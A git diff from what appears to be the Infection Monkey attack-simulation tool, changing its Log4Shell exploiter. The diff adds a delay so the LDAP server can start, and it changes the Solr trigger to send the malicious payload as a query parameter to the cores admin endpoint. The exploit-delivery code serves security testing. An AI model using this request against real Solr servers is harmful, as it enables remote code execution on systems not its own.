diff --git a/monkey/infection_monkey/exploit/log4shell.py b/monkey/infection_monkey/exploit/log4shell.py
index 46129dfe3..e693881f1 100644
--- a/monkey/infection_monkey/exploit/log4shell.py
+++ b/monkey/infection_monkey/exploit/log4shell.py
@@ -34,6 +34,7 @@ class Log4ShellExploiter(WebRCE):
_EXPLOITED_SERVICE = "Log4j"
DOWNLOAD_TIMEOUT = 15
REQUEST_TO_VICTIM_TIME = 5 # How long the request from victim to monkey might take. In seconds
+ LDAP_SERVER_INIT_DELAY = 5 # Time period that code halts waiting for ldap server to start
def __init__(self, host: VictimHost):
super().__init__(host)
@@ -111,6 +112,8 @@ class Log4ShellExploiter(WebRCE):
# constructor directly after merging to the agent-refactor branch.
self._ldap_server_thread = Thread(target=self._ldap_server.run, daemon=True)
self._ldap_server_thread.start()
+ logger.debug(f"Sleeping {Log4ShellExploiter.LDAP_SERVER_INIT_DELAY} seconds for ldap process to start")
+ sleep(Log4ShellExploiter.LDAP_SERVER_INIT_DELAY)
def _stop_servers(self):
logger.debug("Stopping all LDAP and HTTP Servers")
diff --git a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py
index 8078a106c..7bdc3fb42 100644
--- a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py
+++ b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py
@@ -13,9 +13,10 @@ class SolrExploit(IServiceExploiter):
@staticmethod
def trigger_exploit(payload: str, host: VictimHost, port: int):
- url = f"http://{host.ip_addr}:{port}/solr/admin/cores"
- payload = {"foo": payload}
+ url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}"
try:
- resp = requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123
+ logger.debug("Sending malicious SOLR log4j request")
+ requests.post(url, timeout=5, verify=False) # noqa DUO123
+ logger.debug("Request sent")
except requests.ReadTimeout as e:
logger.debug(f"Log4shell request failed {e}")